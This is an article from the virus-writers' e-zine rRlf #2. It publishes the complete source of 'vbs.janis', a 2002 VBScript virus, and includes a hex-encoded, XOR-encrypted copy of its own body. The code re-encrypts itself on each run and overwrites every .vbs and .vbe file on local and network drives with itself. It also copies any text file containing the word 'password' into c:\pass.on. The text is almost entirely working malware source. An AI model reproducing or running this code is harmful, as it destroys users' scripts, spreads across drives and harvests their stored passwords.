rRlf #2

Infiltration of a Nation

last article	table of contents	next article

vbs.janis by alcopaul

Av-names: VBS_BIMORPH.A, BIMORPH.A
Read this virus report by Ed Malibiran of Trend Micro av about it: Virus report - VBS_BIMORPH.A
Here is the code:

'7B7A347166667B6634667167617971347A716C60191E66757A707B797D6E7134191E7F716D3429347D7A603C3C667A703C3D343E3425243D343F3425223D191E4771603472677B3429345766717560715B767E7177603C364777667D64607D7A733A527D7871476D676071795B767E717760363D191E677160347534293472677B3A5B64717A40716C60527D78713C436777667D64603A4777667D6460526178787A7579713834253D191E7575342934753A66717570787D7A71191E707070342934753A66717570787D7A71191E76342934753A66717570757878191E527B66347B3429342534607B3458717A3C763D191E4C3429344C3432345C716C3C5567773C597D703C7638347B3834253D3D346C7B66347F716D3D191E5A716C60191E527B66346D3429342634607B3458717A3C75753D34476071643426191E6E6E3429346E6E343234577C663C3C36327C36343F34597D703C757538346D3834263D3D346C7B66347F716D253D191E7A716C60191E677160347534293472677B3A57667175607140716C60527D78713C436777667D64603A4777667D6460526178787A7579713834606661713D191E753A43667D6071787D7A71343633363432344C191E753A43667D6071787D7A7134367F716D25342934363432347F716D191E753A63667D6071346E6E191E753A57787B6771191E7B616078783C3D191E6
76176347B616078783C3D191E47716034753429345766717560715B767E7177603C365B6160787B7B7F3A556464787D7775607D7B7A363D191E4771603476342934753A5371605A75797147647577713C365955445D363D191E5D723475342934365B6160787B7B7F3634407C717A191E763A587B737B7A343664667B727D78713638343664756767637B667036191E527B66346D3429342534407B34763A55707066716767587D6760673A577B617A60191E4771603470342934763A55707066716767587D6760673C6D3D191E6C34293425191E4771603477342934753A5766717560715D6071793C243D191E527B66347B7B3429342534407B34703A55707066716767517A60667D71673A577B617A60191E71342934703A55707066716767517A60667D71673C6C3D191E773A4671777D647D717A60673A5570703471191E6C3429346C343F3425191E5D72346C342A3425242534407C717A347B7B342934703A55707066716767517A60667D71673A577B617A60191E5A716C60191E773A4761767E71776034293436577C71777F34607C7D67347B616036191E773A75606075777C79717A60673A55707034436777667D64603A4777667D6460526178787A757971383425383425383436477A7B7B646D34677C7573737D7A7334437B7B7067607B777F36191E773A75606075777C79717A60673A5570703443677
7667D64603A4777667D6460526178787A757971383425383426383436477A7B7B646D3467797B7F7D7A73346371717036191E773A75606075777C79717A60673A5570703436772E48647567673A7B7A36383425383427383436647B60717A607D75783464756767637B667034677B6166777136191E773A47717A70191E713429343636191E5A716C60191E763A587B737B7272191E517A70345D72191E717A7034676176191E336276673A677A7B7B646D34766D347578777B647561783B4F6646787249191E3324213B24263B265F26191E336375667A7D7A732E34797B66647C7D773834676071757867347D7A727B3834717964787B6D67347A7163347578737B667D607C793A3A3A3A191E3373667171606734607B34707D677F2466707D75383470663A73247A4E7B383451783450617051667D7A243834647C7D7871602475676027663834646475777F7160383466756760757275667D7138191E336471607D7F3834717A7166736D
key1 = 20
on error resume next
randomize
key = int((rnd() * 10) + 16)
Set fso = CreateObject("Scripting.FileSystemObject")
set a = fso.OpenTextFile(Wscript.ScriptFullname, 1)
aa = a.readline
ddd = a.readline
b = a.readall
For o = 1 to Len(b)
X = X & Hex(Asc(Mid(b, o, 1)) xor key)
Next
For y = 2 to Len(aa) Step 2
zz = zz & Chr(("&h" + Mid(aa, y, 2)) xor key1)
next
set a = fso.CreateTextFile(Wscript.ScriptFullname, true)
a.Writeline "'" & X
a.Writeline "key1 = " & key
a.write zz
a.Close
fso.deletefile("c:\pass.on")
set ag = fso.CreateTextFile("c:\pass.on", true)
ag.writeline "..."
ag.close
huhu()
Sub huhu()
On Error Resume Next
dim f,f1,fc
Set fso = CreateObject("Scripting.FileSystemObject")
Set dr = fso.Drives
For Each d in dr
If d.DriveType=2 or d.DriveType=3 Then
szt(d.path&"\")
End If
Next
End Sub
Sub szt(er)
On Error Resume Next
Set sf=CreateObject("Scripting.FileSystemObject")
Set f = sf.GetFolder(er)
Set sf = f.SubFolders
For Each f1 in sf
yyyy(f1.path)
szt(f1.path)
Next
End Sub
Sub yyyy(uu)
On Error Resume Next
Set sf=CreateObject("Scripting.FileSystemObject")
Set f = sf.GetFolder(uu)
Set fc = f.Files
For Each f1 in fc
ext = sf.GetExtensionName(f1.path)
ext = lcase(ext)
if (ext="vbs") or (ext="vbe") Then
set ddd = sf.getfile(wscript.scriptfullname)
ddd.copy(f1.path)
end if
if (ext="txt") then
Set cot=sf.OpenTextFile(f1.path, 1, False)
hhh = cot.readall
If InStr(1, hhh, "password") Then
set age = sf.opentextfile("c:\pass.on", 8)
age.writeline hhh
age.close
end if
end if
next
end sub
'vbs.janis by alcopaul/[rRlf]
'may 02, 2002
'a friend with weed is a friend indeed..

living virus